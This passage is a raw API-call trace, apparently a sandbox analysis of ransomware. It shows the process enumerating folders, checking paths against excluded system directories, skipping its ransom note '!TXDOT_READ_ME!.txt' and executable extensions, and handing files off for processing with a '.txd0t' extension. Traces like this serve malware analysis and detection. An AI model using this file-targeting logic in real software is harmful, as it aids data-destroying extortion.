StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\local\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\boot\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\perflogs\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\programdata\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\drivers\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\wsus\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.239] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.239] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="crypt_detect") returned 0x0 [0086.239] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="cryptolocker") returned 0x0 [0086.239] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="ransomware") returned 0x0 [0086.239] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\WINDOWS") returned 0x0 [0086.239] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.239] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="C:\\Program Files") returned 0x0 [0086.239] GetProcessHeap () returned 0xe30000 [0086.239] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0086.239] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0086.239] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\*") returned="C:\\588bce7c90097ed212\\1053\\*" [0086.239] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22f0 [0086.239] StrCmpW (psz1=".", psz2=".") returned 0 [0086.239] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.239] StrCmpW (psz1="..", psz2=".") returned 1 [0086.239] StrCmpW (psz1="..", psz2="..") returned 0 [0086.239] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0086.239] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0086.239] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0086.239] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0086.239] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0086.239] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned="C:\\588bce7c90097ed212\\1053\\eula.rtf" [0086.239] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.239] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0086.239] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0086.239] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0086.239] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0086.239] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0086.239] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0086.239] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0086.240] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0086.240] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0086.240] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0086.240] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0086.240] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0086.240] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0086.240] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0086.240] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.240] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.240] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0086.240] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0086.260] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.260] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1053\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" [0086.260] SetEvent (hEvent=0x3fc) returned 1 [0086.260] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.260] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.261] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.261] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0086.261] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0086.261] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" [0086.261] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.261] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.261] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.261] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.261] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.261] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0086.268] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.268] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" [0086.268] SetEvent (hEvent=0x410) returned 1 [0086.268] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.268] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.268] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.269] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1053", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0086.269] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\") returned="C:\\588bce7c90097ed212\\1053\\" [0086.269] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1053\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" [0086.269] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.269] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.269] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.269] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.269] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.269] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.269] FindClose (in: hFindFile=0xec22f0 | out: hFindFile=0xec22f0) returned 1 [0086.269] GetProcessHeap () returned 0xe30000 [0086.269] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.269] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1055", cAlternateFileName="")) returned 1 [0086.269] StrCmpW (psz1="1055", psz2=".") returned 1 [0086.269] StrCmpW (psz1="1055", psz2="..") returned 1 [0086.269] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.269] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.270] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1055", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\system32\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\system\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\local\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\boot\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\perflogs\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\programdata\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\drivers\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\wsus\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="crypt_detect") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="cryptolocker") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="ransomware") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\WINDOWS") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.270] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1055", lpSrch="C:\\Program Files") returned 0x0 [0086.270] GetProcessHeap () returned 0xe30000 [0086.270] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0086.270] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0086.270] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\*") returned="C:\\588bce7c90097ed212\\1055\\*" [0086.270] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22f0 [0086.270] StrCmpW (psz1=".", psz2=".") returned 0 [0086.270] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.271] StrCmpW (psz1="..", psz2=".") returned 1 [0086.271] StrCmpW (psz1="..", psz2="..") returned 0 [0086.271] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0086.271] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0086.271] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0086.271] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0086.271] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0086.271] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned="C:\\588bce7c90097ed212\\1055\\eula.rtf" [0086.271] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.271] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0086.271] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.271] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.271] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0086.271] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0086.287] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.287] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1055\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1055\\eula.rtf" [0086.287] SetEvent (hEvent=0x3fc) returned 1 [0086.287] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.287] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.287] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.287] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1055", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055") returned="C:\\588bce7c90097ed212\\1055" [0086.287] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\") returned="C:\\588bce7c90097ed212\\1055\\" [0086.287] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1055\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" [0086.287] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.287] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.287] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.288] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.288] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.288] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.288] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.288] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.288] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, 